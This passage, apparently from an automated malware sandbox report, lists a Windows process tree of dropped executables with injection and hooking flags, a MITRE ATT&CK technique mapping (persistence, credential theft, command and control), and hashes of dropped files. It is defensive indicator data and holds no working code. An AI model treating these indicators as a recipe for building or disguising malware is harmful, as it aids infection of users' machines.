                                                                            PID:4540
                                                                            • C:\Users\Admin\AppData\Local\Temp\jiehmzxq.5hs\toolspab1.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jiehmzxq.5hs\toolspab1.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                              PID:4588
                                                                              • C:\Users\Admin\AppData\Local\Temp\jiehmzxq.5hs\toolspab1.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jiehmzxq.5hs\toolspab1.exe
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:4672
                                                                  • C:\Users\Admin\AppData\Local\Temp\38DC.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\38DC.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:2644
                                                                  • C:\Users\Admin\AppData\Local\Temp\41E1.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\41E1.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:2680
                                                                    • C:\Users\Admin\AppData\Local\Temp\41E1.exe
                                                                      "{path}"
                                                                      2⤵
                                                                      • Executes dropped EXE
                                                                      PID:6536
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 996
                                                                        3⤵
                                                                        • Program crash
                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                        PID:6548
                                                                  • C:\Users\Admin\AppData\Local\Temp\458A.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\458A.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:4228
                                                                  • C:\Users\Admin\AppData\Local\Temp\4AE8.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\4AE8.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:4244
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                      2⤵
                                                                        PID:4344
                                                                    • C:\Users\Admin\AppData\Local\Temp\5526.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\5526.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:4664
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                        2⤵
                                                                          PID:1972
                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                        1⤵
                                                                          PID:4584
                                                                        • C:\Windows\explorer.exe
                                                                          C:\Windows\explorer.exe
                                                                          1⤵
                                                                            PID:4732
                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                            1⤵
                                                                              PID:4832
                                                                            • C:\Windows\explorer.exe
                                                                              C:\Windows\explorer.exe
                                                                              1⤵
                                                                                PID:1428
                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                1⤵
                                                                                  PID:5092
                                                                                • C:\Windows\explorer.exe
                                                                                  C:\Windows\explorer.exe
                                                                                  1⤵
                                                                                    PID:3440
                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                    1⤵
                                                                                      PID:5200
                                                                                    • C:\Windows\explorer.exe
                                                                                      C:\Windows\explorer.exe
                                                                                      1⤵
                                                                                        PID:1480
                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                        1⤵
                                                                                          PID:5296

                                                                                        Network

                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                        Persistence

                                                                                        Registry Run Keys / Startup Folder

                                                                                        1
                                                                                        T1060

                                                                                        BITS Jobs

                                                                                        1
                                                                                        T1197

                                                                                        Defense Evasion

                                                                                        Modify Registry

                                                                                        2
                                                                                        T1112

                                                                                        BITS Jobs

                                                                                        1
                                                                                        T1197

                                                                                        Install Root Certificate

                                                                                        1
                                                                                        T1130

                                                                                        Credential Access

                                                                                        Credentials in Files

                                                                                        2
                                                                                        T1081

                                                                                        Discovery

                                                                                        Software Discovery

                                                                                        1
                                                                                        T1518

                                                                                        Security Software Discovery

                                                                                        1
                                                                                        T1063

                                                                                        Query Registry

                                                                                        4
                                                                                        T1012

                                                                                        Peripheral Device Discovery

                                                                                        2
                                                                                        T1120

                                                                                        System Information Discovery

                                                                                        4
                                                                                        T1082

                                                                                        Remote System Discovery

                                                                                        1
                                                                                        T1018

                                                                                        Collection

                                                                                        Data from Local System

                                                                                        2
                                                                                        T1005

                                                                                        Command and Control

                                                                                        Web Service

                                                                                        1
                                                                                        T1102

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                          MD5

                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                          SHA1

                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                          SHA256

                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                          SHA512

                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                          MD5

                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                          SHA1

                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                          SHA256

                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                          SHA512

                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                        • C:\Program Files\Java\YDBPRFPDLZ\ultramediaburner.exe
                                                                                          MD5

                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                          SHA1

                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                          SHA256

                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                          SHA512

                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                        • C:\Program Files\Java\YDBPRFPDLZ\ultramediaburner.exe
                                                                                          MD5

                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                          SHA1

                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                          SHA256

                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                          SHA512

                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                          MD5

                                                                                          0d0e81f0756c606f91750b490e71ae7b

                                                                                          SHA1

                                                                                          ef11c566a508757912305e8da612c6d2acfc1670

                                                                                          SHA256

                                                                                          cb6c9784bb3f77d9fbe4ec75cac232fd33562bced9e7fe26e93a36a3a8941bfc

                                                                                          SHA512

                                                                                          4ae3a0af86dd84def89647e2fac6e95e387b48e588ca0884f5fceba365927dc4905912ae7a179b24c55c5d78e93e0ac7a389d501c96e681aa356df2d22d199fc

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                          MD5

                                                                                          b0b41126565a0a6e9983b80bbeeeda52

                                                                                          SHA1

                                                                                          55de1515ae28f594d7eb30211df6aa99b2ce6bd5

                                                                                          SHA256

                                                                                          74e93fcf70e5301715d1d53cc2e2a1eb484bcad74baea28bbe648a5161e0c5a5

                                                                                          SHA512

                                                                                          0b31bc5ec69834e7e9228bf373176286c697f7ac23a541f655aa4bc50284ea643d25c3cdbd7ecf1e4e0d128c6dc06a74ad1c2480d7a8661ee4d4c7cd25ef7ffc

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                          MD5

                                                                                          74a7251be98bb987900b577bc55158d6

                                                                                          SHA1

                                                                                          cb3a6b498627f1c546102f5010efc4721c6f8a89

                                                                                          SHA256

                                                                                          5069f6d5a8b6d4864dba1524ca42e88216cb7dabcc087f65f2c99ec55d13ac97

                                                                                          SHA512

                                                                                          1bbd9932d07e344bd1153de6b69b4a1f2271149d84e7ae20ab49f883d47e0370843e4edaa0bc5fe2717297cb06a568ba09cfdf700cd6b8bd6f85fae6685ebdd5

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                          MD5

                                                                                          1d8a20eae9bf80b92eeabbeea9f9198a

                                                                                          SHA1

                                                                                          91d023eab842468916f6f3dbe733ee488933abde

                                                                                          SHA256

                                                                                          7a52a61a68fa28659e93ee412691fd4f2add8d45463030d0a22707522565701f

                                                                                          SHA512

                                                                                          46aa3bde21f034645b56d0e9b616cb42dbb037fe9578fd872212dc51875042a4acd2c1052f6c28bbff3cf6e9db66931b0c437800598614dd1b8d908228ed1423

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                          MD5

                                                                                          90eb35adbd9a2cdb490cbe3cd4a3c22e

                                                                                          SHA1

                                                                                          7b0539d95b713b12a965004e3181ff766527a5a8

                                                                                          SHA256

                                                                                          aa75d4b2fcff52401fef81cae35f0a8df59bda07c0cb9f919139968bcb88bc43

                                                                                          SHA512

                                                                                          1928e07b638824a80d790457058a4e64c4cd631fd5420ecfaf10b492a8834c9dfe508b24d98c2b78b4bc62a2a6497faf080339b619dbcc46521e9436d5abca73

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                          MD5

                                                                                          667c0d7c49cec4f7ee4130de492dca9f

                                                                                          SHA1

                                                                                          536b9f55221333af3f5db5919c28283b29dfcead

                                                                                          SHA256

                                                                                          d651db1b5ef75239b04305201d55881a93b824b74c6d9d4358329974ba7dcec5

                                                                                          SHA512

                                                                                          64990ce797ccead2c255fd83c082966054dbab0f8b3f7236775eacba9d4f76cbe8eaaad0f05b56df6dff3c5ea62644f30a5b643691c57e5f04d82ed3159d721c

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                          MD5

                                                                                          bb22ecd0cc976ae3e011938feed29a99

                                                                                          SHA1

                                                                                          6cf188a6a3d1e5ab26c15214450cecf24bc8753a

                                                                                          SHA256

                                                                                          c5a1e7fcca0b02f12c947da9ac37c1e5a1c4776e8b225d644c048e74e73943d3

                                                                                          SHA512

                                                                                          05b4553f1db3d7bcb3f143edbe8369acc86727db35cc07f8eee2deb1fad73467552e5b50379158e39b879f648ecc995ca0cb14c8efa27c5adfddd31d7dd79af6

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                          MD5

                                                                                          474f3881d4d344be7689a03cacfff1e2

                                                                                          SHA1

                                                                                          5e80a98e37a09fb5c90e6f7f17d7c81bfaaf69d6

                                                                                          SHA256

                                                                                          c59d648e50a1de69d723de6e5e2a236c39b92610c180dd4764a54f53440fba81

                                                                                          SHA512

                                                                                          4879cc18ada412f32e903d0c318d6bd156a1686988689da8d8eb86e4830008f6bb7b2fc45168027292309b627342a71995dadb7fddfe863ec8b682550b425095

                                                                                        • C:\Users\Admin\AppData\Local\AdvinstAnalytics\6073fee5118372253d99d22b\1.0.0\tracking.ini
                                                                                          MD5

                                                                                          56a8bd3c51fd5de376245603fe32fc7c

                                                                                          SHA1

                                                                                          b5cbec06b51b3ba5f698efa21355d7200128679c

                                                                                          SHA256

                                                                                          206201604078ca22e0e700da7b91f33e59c509152f59f6026c4957887d8f7c6d

                                                                                          SHA512

                                                                                          2782641cbbfba31308f53faf0530678b173fbf3227e8eb07a9b00539c3b19aedca61105af765e232f9c85861028beb5bcdbf6d4ba59c0e7f2907b670a68d8553

                                                                                        • C:\Users\Admin\AppData\Local\Temp\1350633989.exe
                                                                                          MD5

                                                                                          3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                          SHA1

                                                                                          f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                          SHA256

                                                                                          2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                          SHA512

                                                                                          8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\1350633989.exe
                                                                                          MD5

                                                                                          3a5aa6041f6987d4b375ef6c9d3728d1

                                                                                          SHA1

                                                                                          f40bcc90890cc1d848abdb163d6a3744712508d0

                                                                                          SHA256

                                                                                          2b85bbff2d434d0400c41fdefc2c8630b7895a5fa7f988775e0787814ca8529f

                                                                                          SHA512

                                                                                          8f9dc4b8aca6738992d8d6b5a2185dac50613ee233e4684bc43034627e99a7be0049700f766dbe36e1d2458cee3e7b26d5c23c2fe59296f0524a02536d389e1c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\3phrmqcj.rd2\installer.exe
                                                                                          MD5

                                                                                          cd5e5ff81c7acf017878b065357f3568

                                                                                          SHA1

                                                                                          096900f55df446b72f9237f80aaf090001afa2a2

                                                                                          SHA256

                                                                                          7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

                                                                                          SHA512

                                                                                          1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

                                                                                        • C:\Users\Admin\AppData\Local\Temp\3phrmqcj.rd2\installer.exe
                                                                                          MD5

                                                                                          cd5e5ff81c7acf017878b065357f3568

                                                                                          SHA1

                                                                                          096900f55df446b72f9237f80aaf090001afa2a2

                                                                                          SHA256

                                                                                          7eadd0ce64f3bfad81459a33a6f12521126b67a69dc19160e2ada42d50b4a3c3

                                                                                          SHA512

                                                                                          1cf3d72f09827b5ea5f0ab4560032a09007845f615b18ea5a1d0eac697b100e88967db2b42ce6c36a957246ba8d011b0881c45bff37eed42b9803db687d9f1c3

                                                                                        • C:\Users\Admin\AppData\Local\Temp\9f-39b75-d39-47daf-fad6a20fca5ec\Gahogaryjae.exe
                                                                                          MD5

                                                                                          24988abf1cac1c74e9385b4bff16e8f7

                                                                                          SHA1

                                                                                          50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                          SHA256

                                                                                          afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                          SHA512

                                                                                          a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\9f-39b75-d39-47daf-fad6a20fca5ec\Gahogaryjae.exe
                                                                                          MD5

                                                                                          24988abf1cac1c74e9385b4bff16e8f7

                                                                                          SHA1

                                                                                          50bae2be9668aad4f3a3a7d404c731f541b12f67

                                                                                          SHA256

                                                                                          afad8cc3e378f4d22ca2e325a63998e4bcbb70509135532b450c22fdd47e993c

                                                                                          SHA512

                                                                                          a707b54611976264a3671907faabd817e58e4ee572637ad1193b7c346b7cb63b98a8e52a87cb2b135a5e40f0e97e3f040a04804c0164a1d6caa856b2f1fe742f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\9f-39b75-d39-47daf-fad6a20fca5ec\Gahogaryjae.exe.config
                                                                                          MD5

                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                          SHA1

                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                          SHA256

                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                          SHA512

                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                        • C:\Users\Admin\AppData\Local\Temp\9f-39b75-d39-47daf-fad6a20fca5ec\Kenessey.txt
                                                                                          MD5

                                                                                          97384261b8bbf966df16e5ad509922db

                                                                                          SHA1

                                                                                          2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                          SHA256

                                                                                          9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                          SHA512

                                                                                          b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                        • C:\Users\Admin\AppData\Local\Temp\MSI2C0.tmp
                                                                                          MD5

                                                                                          d07ddd437009ebb9c21882579bf2df0d

                                                                                          SHA1

                                                                                          a24a636db25ed29e5353fa5d274bf80c2ab8ad98

                                                                                          SHA256

                                                                                          c4f49b995e259a043af81d987c6781b8736f5709348bb997edad183ccc396caf

                                                                                          SHA512

                                                                                          8c845ec3effc0041db3a550adddc1f175e1169ca00767c89d38fabaa59f97ae987b529c0ad71d0def0007a21fb3fd98200b0834408c5889d93f9ea035c60eca3

                                                                                        • C:\Users\Admin\AppData\Local\Temp\MSI4B4.tmp
                                                                                          MD5

                                                                                          5a25fb13ed470b77eefd2eb89cb62c47

                                                                                          SHA1

                                                                                          3dbe567e3c8c8cd0f7e3c71a2536578ee11bf2a6

                                                                                          SHA256

                                                                                          0dca4854897ca77080c57936ad5c7c6c5f5c656a5785c09c7d2c1d196e4f3336

                                                                                          SHA512

                                                                                          2ec64666ad42e955e91378af855da59d3bcfb4cc3574bf023dda878c7d3e3dec442625de6e6b0434d1caf86a525395b04038cf7fdc6c292405d9f19c6f4e9952

                                                                                        • C:\Users\Admin\AppData\Local\Temp\ajiclnv5.5mf\001.exe
                                                                                          MD5

                                                                                          fa8dd39e54418c81ef4c7f624012557c

                                                                                          SHA1

                                                                                          c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                          SHA256

                                                                                          0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                          SHA512

                                                                                          66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                        • C:\Users\Admin\AppData\Local\Temp\ajiclnv5.5mf\001.exe
                                                                                          MD5

                                                                                          fa8dd39e54418c81ef4c7f624012557c

                                                                                          SHA1

                                                                                          c3cb938cc4086c36920a4cb3aea860aed3f7e9da

                                                                                          SHA256

                                                                                          0b045c0b6f8f3e975e9291655b3d46cc7c1d39ceb86a9add84d188c4139d51f7

                                                                                          SHA512

                                                                                          66d9291236ab6802ff5677711db130d2f09e0a76796c845527a8ad6dedcbf90c3c6200c8f05a4ae113b0bff597521fda571baafaa33a985c45190735baf11601

                                                                                        • C:\Users\Admin\AppData\Local\Temp\fvv0dt1u.0no\google-game.exe
                                                                                          MD5

                                                                                          531020fb36bb85e2f225f85a368d7067

                                                                                          SHA1

                                                                                          a5f78a41f1544fa3da0836fb453cf558c2fce846

                                                                                          SHA256

                                                                                          370dcae16de62c8cec5f7bf4366ddc62a44f526b31b905a7f4d97bbe3d41fe11

                                                                                          SHA512

                                                                                          864f1523a984da68aea9ef58e2ef9738ea47cc16ca4cb3f80d598abb09246f2517d5225324f1dd27aa38000e8e2f1642de1a20dfefc6203e558898a7b43f705e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\fvv0dt1u.0no\google-game.exe
                                                                                          MD5

                                                                                          531020fb36bb85e2f225f85a368d7067

                                                                                          SHA1

                                                                                          a5f78a41f1544fa3da0836fb453cf558c2fce846

                                                                                          SHA256

                                                                                          370dcae16de62c8cec5f7bf4366ddc62a44f526b31b905a7f4d97bbe3d41fe11

                                                                                          SHA512

                                                                                          864f1523a984da68aea9ef58e2ef9738ea47cc16ca4cb3f80d598abb09246f2517d5225324f1dd27aa38000e8e2f1642de1a20dfefc6203e558898a7b43f705e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.dll
                                                                                          MD5

                                                                                          b29f18a79fee5bd89a7ddf3b4be8aa23

                                                                                          SHA1

                                                                                          0396814e95dd6410e16f8dd0131ec492718b88da

                                                                                          SHA256

                                                                                          9d4eac47f833f3f02f2f1c295c91928f55e2e5ac1189743ffff680f4f745950e

                                                                                          SHA512

                                                                                          f47861ceb9f73ea9ff74d6c65b363005b6931086ae36a25599bf644649f84ff1769c78cb7fd48a51352baf28ef7d3f1dd36414bb15365ed04605c488d11d08cd

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0TGOV.tmp\ultramediaburner.tmp
                                                                                          MD5

                                                                                          4e8c7308803ce36c8c2c6759a504c908

                                                                                          SHA1

                                                                                          a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                          SHA256

                                                                                          90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                          SHA512

                                                                                          780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0TGOV.tmp\ultramediaburner.tmp
                                                                                          MD5

                                                                                          4e8c7308803ce36c8c2c6759a504c908

                                                                                          SHA1

                                                                                          a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

                                                                                          SHA256

                                                                                          90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

                                                                                          SHA512

                                                                                          780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-1M3VH.tmp\Ultra.exe
                                                                                          MD5

                                                                                          cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                          SHA1

                                                                                          ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                          SHA256

                                                                                          0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                          SHA512

                                                                                          49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-1M3VH.tmp\Ultra.exe
                                                                                          MD5

                                                                                          cc2e3f1906f2f7a7318ce8e6f0f00683

                                                                                          SHA1

                                                                                          ff26f4b8ba148ddd488dde4eadd2412d6c288580

                                                                                          SHA256

                                                                                          0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

                                                                                          SHA512

                                                                                          49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-VBD6S.tmp\Install.tmp
                                                                                          MD5

                                                                                          45ca138d0bb665df6e4bef2add68c7bf

                                                                                          SHA1

                                                                                          12c1a48e3a02f319a3d3ca647d04442d55e09265

                                                                                          SHA256

                                                                                          3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

                                                                                          SHA512

                                                                                          cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\q4rb51i1.pgp\gpooe.exe
                                                                                          MD5

                                                                                          6e81752fb65ced20098707c0a97ee26e

                                                                                          SHA1

                                                                                          948905afef6348c4141b88db6c361ea9cfa01716

                                                                                          SHA256

                                                                                          b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6

                                                                                          SHA512

                                                                                          00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

                                                                                        • C:\Users\Admin\AppData\Local\Temp\q4rb51i1.pgp\gpooe.exe
                                                                                          MD5

                                                                                          6e81752fb65ced20098707c0a97ee26e

                                                                                          SHA1

                                                                                          948905afef6348c4141b88db6c361ea9cfa01716

                                                                                          SHA256

                                                                                          b978743a252c7d0661b1a41a60a68ee1a4d4ff5f21c597ebbe1c50dbe91dbed6

                                                                                          SHA512

                                                                                          00c870461d47b7479f15594659141e3ced7c3f3d4b4151fb7776ab62d4816c587b388d024ab8edff1190bd23148897f085f736e897657c6f02a8f62f7af1cfaa

                                                                                        • C:\Users\Admin\AppData\Local\Temp\xbzineib.4hk\sskiper.exe
                                                                                          MD5

                                                                                          4957402561fcfa555d04142577662074

                                                                                          SHA1

                                                                                          f03275e4749030011d6e74d26e41bc0e5a2bf635

                                                                                          SHA256

                                                                                          9119c14b73b45a6a7e134559ba2ce583f6e4111c81911a5e0abd28e950798018

                                                                                          SHA512

                                                                                          70f5f83e0de334d394ece1ff06cc203080bb877ae1938e24543b5b4a0dd5d6c4f61244d98d5f734387a2e082e7395e321c9d69c2e46ac06eb3098a7e5c00bb4a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\xbzineib.4hk\sskiper.exe
                                                                                          MD5

                                                                                          4957402561fcfa555d04142577662074

                                                                                          SHA1

                                                                                          f03275e4749030011d6e74d26e41bc0e5a2bf635

                                                                                          SHA256

                                                                                          9119c14b73b45a6a7e134559ba2ce583f6e4111c81911a5e0abd28e950798018

                                                                                          SHA512

                                                                                          70f5f83e0de334d394ece1ff06cc203080bb877ae1938e24543b5b4a0dd5d6c4f61244d98d5f734387a2e082e7395e321c9d69c2e46ac06eb3098a7e5c00bb4a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\zfdtpgu4.go4\KiffMainE1.exe
                                                                                          MD5

                                                                                          9ffeb510285c1c7450b00cad5cf7e28b

                                                                                          SHA1

                                                                                          9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                          SHA256

                                                                                          bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                          SHA512

                                                                                          0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                        • C:\Users\Admin\AppData\Local\Temp\zfdtpgu4.go4\KiffMainE1.exe
                                                                                          MD5

                                                                                          9ffeb510285c1c7450b00cad5cf7e28b

                                                                                          SHA1

                                                                                          9b2db42751d4715d345ebbc1982118d91a6f9257

                                                                                          SHA256

                                                                                          bab076688d1bdf3ce559a1a8ae33172b39a6e342609115ee4bf7646a863ebc10

                                                                                          SHA512

                                                                                          0efbaafe0ed2de24254462df95d4b78d4c95b4762ce06b00ea8c38334762d601f146efcf25e5f76ec40a89d2a4404b49abf50b605e7c3298e21d7a9bb7025bcb

                                                                                        • C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi
                                                                                          MD5

                                                                                          ccaf3827849d948abc7b3c0874c4aa4c

                                                                                          SHA1

                                                                                          08a3b22dfd680401f02c6ae02bf0fda177d0d111

                                                                                          SHA256

                                                                                          1c6912916cc8e466888d066ab73b607ac128a3280841b433dea9473b54aac7fa

                                                                                          SHA512

                                                                                          96a893d028ed56fae530f2b24b321c1a29cd8f5a5873a32b4e62f003fb5791e5a8e66a437ff9605559f2355f81bca7c4c3bd31f02fe86e35ceb6199b77bf2296

                                                                                        • C:\Windows\Installer\MSI9F2.tmp
                                                                                          MD5

                                                                                          07df9ca625c2cb953b2a7f7f699cee7c

                                                                                          SHA1

                                                                                          3225e84b51ba76eb650231c94231b70b70b997c9

                                                                                          SHA256

                                                                                          265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

                                                                                          SHA512

                                                                                          104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

